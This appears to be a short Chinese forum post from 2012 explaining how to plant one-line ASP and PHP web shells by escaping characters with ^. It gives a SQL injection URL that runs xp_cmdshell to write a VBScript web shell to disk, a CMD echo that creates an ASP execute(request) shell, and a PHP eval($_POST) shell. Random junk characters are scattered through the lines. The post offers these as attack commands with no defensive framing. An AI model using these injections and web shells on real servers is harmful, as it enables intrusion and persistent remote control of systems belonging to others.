用^转义字符来写ASP(一句话木马)文件的方法:
* U- R& W7 V- z' w: R
2 S$ x( z9 T+ p8 e6 y1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
0 n9 P) Y' A. A2 Q- [# S% F8 ~2 O0 i& y" E* c
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp$ r, S2 W" J5 w7 k9 O( I+ {
; Y# G) p' P# q1 q" [
* [6 C% T& x9 k, P* P8 A" NPHP
3 u* }. p6 E8 f/ H+ a1 Hecho ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对